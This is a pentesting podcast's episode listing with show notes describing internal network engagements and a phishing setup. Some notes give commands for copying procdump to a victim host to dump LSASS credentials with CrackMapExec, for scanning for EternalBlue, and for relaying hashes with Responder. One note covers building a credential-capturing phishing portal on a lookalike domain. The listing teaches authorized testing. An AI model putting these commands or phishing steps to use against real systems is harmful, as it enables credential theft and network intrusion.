7MS #2: The Importance of Logging and Alerting! (audio)

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! I'm sorry it took me forever and a day to get this episode up, but I'm thrilled to share part 4 (the final chapter - for now anyways) of my interview with the red team guys, Ryan and Dave! In today's episode we talk about: Running into angry system admins (that are either too fired up or not fired up enough) Being wrong without being ashamed When is it necessary to make too much noice to get caught during an engagement? What are the top 5 tools you run on every engagement? How do you deal with monthly test reports indefinitely being a copy/paste of the previous month's report? How do you deal with clients who scope things in such as way that the test is almost impossible to conduct? How do you deal with colleagues who take findings as their own when they talk with management? How do you work with clients who don't know why they want a test - except to check some sort of compliance checkmark? What is a typical average time to complete a pentest on a vendor (as part of a third-party vendor assessment)? How could a fresh grad get into a red team job? What do recruiters look for candidates seeking red team positions? If a red team is able to dump a whole database of hashes or bundle of local machine hashes, should they crack them? What do you do when you're contracted for a pentest, but on day one your realize the org is not at all ready for one? What's your favorite red team horror story?

1 Marras 20191h 24min

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. Today I'm joined by a very special guest: Mrs. 7MS! She joins me on a road trip to northern MN, reads me some questions from the 7MS mail bag, and we tackle them together (with a side order of commentary on weddings, overheating iPads, cheap hotels and the realization that this is likely the first - and only episode that Mrs. 7MS has ever listened to). Links to things discussed this episode: Wireless pentest certs: SEC617 - SANS course that covers wifi pentesting (with WPA enterprise attacks) Offensive Security Wireless Professional Good/free pentest training options: Pentester Academy VulnHub Rastalabs The Cyber Mentor Free logging/alerting solutions for SMBs: WEFFLES Logging Made Easy HELK Wazuh

22 Loka 201944min

In this episode I talk about some things I learned about making your own kick-butt cred-capturing phishing campaign and how to do so on the (relatively) quick and (relatively) cheap! These tips include: Consider this list of top 9 phishing simulators. Check out GoPhish! Then spin up a free tier Kali AWS box Follow the instructions to install GoPhish and get it running on your AWS box Use the Expired Domains site to buy up a domain that is similar to your victim - maybe just one character off - but has been around a while and has a good reputation Add a G Suite or O365 email account (or whatever email service you prefer) to the new domain Create a convincing cred-capturing portal on GoPhish - I used some absolutely disguisting and embarassing HTML like this (see show notes on 7ms.us): Use this awesome article to secure your fancy landing page with a LetsEncrypt cert! Have fun!!!

12 Loka 201950min

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! This episode is a "sequel" of sorts to part 9 where I was helping another company tag-team an internal network pentest. (In announcer voice) "When we last left our heroes we had..." Relayed one high-priv cred from one box to another Dumped and cracked a local machine's hash Passed that hash around the network Found (via Bloodhound) some high value targets we wanted to grab domain admin creds from Set the wdigest flag via CrackMapExec Today, we talk about how we came back to the pentest a few days later and scripted the procdump/lsass operation to (hopefully) grab cleartext credentials from these high value targets. Here's how we did it: mkdir /share wget https://live.sysinternals.com/procdump64.exe screen -R smb /opt/impacket/examples/smbserver.py -smb2support share /share Then, we ran the following CME commands to copy procdump over to the victim machine, create the dump, take the dump, then delete procdump.exe: crackmapexec smb 192.168.55.220 -u Administrator -p 'Winter2018!' --local-auth --exec-method smbexec -x 'copy "\\192.168.55.60\share\procdump64.exe" "c:\users\public\procdump64.exe"' (more on today's episode show notes)

1 Loka 201930min

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. Today's episode is about a pentest that was pretty unique for me. I got to ride shotgun and kind of be in the shadows while helping another team pwn a network. This was an especially interesting one because the client had a lot of great security defenses in place, including: Strong user passwords A SIEM solution that appeared to be doing a great job We did some looking for pwnage opportunities such as: Systems missing EternalBlue patch Systems missing BlueKeep patch What got us a foot in the door was the lack of SMB signing. Check this gist to see how you can use RunFinger.py to find hosts without SMB signing, then use Impacket and Responder to listen for - and pass - high-priv hashes. Side note: I'm working on getting a practical pentesting gist together in the vein of Penetration Testing: A Hands-On Introduction to Hacking and Hacker Playbook.

24 Syys 201934min

For Windows VMs Take a snapshot right after the OS is installed, as (I believe) the countdown timer for Windows evaluation mode starts upon first "real" boot. Want to quickly run Windows updates on a fresh Win VM? Try this (here's the source): powershell Install-PackageProvider -Name NuGet -Force powershell Install-Module PSWindowsUpdate -force powershell Set-ExecutionPolicy bypass powershell Import-Module PSWindowsUpdate powershell Get-WindowsUpdate powershell Install-WindowsUpdates -AcceptAll -AutoReboot To turn on remote desktop: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0 To set the firewall to allow RDP: Enable-NetFirewallRule -DisplayGroup "Remote Desktop" To stop the freakin' Windows hosts from going to sleep: powercfg.exe -change -standby-timeout-ac 0 To automate the install of VMWare tools, grab the package from VMWare's site, decompress it, then: setup64.exe /s /v "/qn reboot=r" To set the time zone via command line, run tzutil /l and then you can set your desired zone with something like tzutil /s "Central Standard Time" For Linux VMs Get SSH keys regenerated and install/run openssh server: apt install openssh-server -y mkdir /etc/ssh/default_keys mv /etc/ssh/ssh_host_* /etc/ssh/default_keys/ dpkg-reconfigure openssh-server systemctl enable ssh.service systemctl start ssh.service Then grab some essential pentesting tools using Kali essentials, and keep 'em updated git update Next user group meeting September 30!

18 Syys 201938min

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. Today's episode is a continuation of episode #379, where we: Conducted general nmap scans (and additional scans specifically looking for Eternal Blue) Sucked our nmap scans into Eyewitness Captured and cracked some creds with Paperspace Scraped the company's marketing Web site with brutescrape and popped a domain admin account (or so I thought!) Today, the adventure continues with: Checking the environment for CVE-2019-1040 Picking apart the privileges on my "pseudo domain admin" account Making a startling discovery about how almost all corp passwords were stored Enjoy!

5 Syys 201928min

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! This episode, besides talking about a man who screamed at me for not being on my cell phone, covers another tale of internal network pentest pwnage! Topics/tactics covered include: Review of setting up your DIY pentest dropbox Choosing the right hardware (I'm partial to this NUC) Running Responder to catch creds Using Eyewitness to snag screenshots of stuff discovered with nmap scanning Nmap for Eternal Blue with nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 192.168.0.0/24 Running Sharphound to get a map of the AD environment Cracking creds with Paperspace When cracking, make sure to scrape the customer's public Web sites for more wordlist ideas!

30 Elo 201943min